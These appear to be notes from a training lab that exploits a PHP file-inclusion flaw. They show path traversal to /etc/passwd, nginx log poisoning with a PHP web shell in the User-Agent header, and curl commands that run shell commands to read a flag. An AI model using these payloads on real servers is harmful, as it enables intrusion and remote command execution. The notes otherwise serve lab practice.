10.30.18.253 - - [10/Feb/2025:01:02:37 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log////////../../../etc/passwd HTTP/1.1" 200 1416 "-" "Fuzz Faster U Fool v2.1.0-dev"
10.30.18.253 - - [10/Feb/2025:01:08:25 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 90671 "-" "Apache Log Poisoning"
#STEP 4: poison the User-Agent header by setting it to a basic PHP web shell
BURP > Repeater
Request
...
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log{&cmd=ls+/} HTTP/1.1 //note the use of cmd=pwd here while setting the user-agent string to a php web shell
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET['cmd']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Response
...
10.30.18.253 - - [10/Feb/2025:01:19:04 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/ HTTP/1.1" 200 91027 "-" "bin
dev
etc
flag_dacc60f2348d.txt
home
...
BURP > Repeater
Request
...
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log{&cmd=cat+/flag_dacc60f2348d.txt} HTTP/1.1 //note the use of cmd=pwd here while setting the user-agent string to a php web shell
Host: 94.237.60.159:37814
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET['cmd']);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Response
...
10.30.18.253 - - [10/Feb/2025:01:28:41 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt HTTP/1.1" 200 91601 "-" "a9a892dbc9faf9a014f58e007721835e
* change the value of "User-Agent" string to a php web shell along with the cmd in one execution
* ALT:
curl -s 'http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/'
10.30.18.253 - - [10/Feb/2025:01:19:04 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=ls+/ HTTP/1.1" 200 91027 "-" "bin
dev
etc
flag_dacc60f2348d.txt
home
...
curl -s 'http://94.237.60.159:37814/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt'
10.30.18.253 - - [10/Feb/2025:01:28:41 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt HTTP/1.1" 200 91601 "-" "a9a892dbc9faf9a014f58e007721835e"Last updated